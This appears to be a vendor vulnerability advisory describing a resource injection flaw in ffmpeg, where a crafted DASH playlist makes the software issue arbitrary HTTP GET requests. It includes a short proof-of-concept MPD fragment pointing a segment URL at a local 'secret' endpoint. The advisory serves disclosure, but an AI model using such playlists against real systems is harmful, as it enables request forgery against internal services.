In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsThere is no fixed version for ffmpeg
.
Affected versions of this package are vulnerable to Resource Injection via a crafted DASH playlist containing malicious URLs. An attacker can make arbitrary HTTP GET requests on behalf of the machine running the software by supplying a malicious URL in the playlist.
<Period duration="PT1S">
<BaseURL></BaseURL>
<AdaptationSet contentType="video" lang="en">
<Representation id="video">
<SegmentList>
<SegmentURL media="http://localhost:8000/secret"/>
</SegmentList>
</Representation>
</AdaptationSet>
</Period>
</MPD>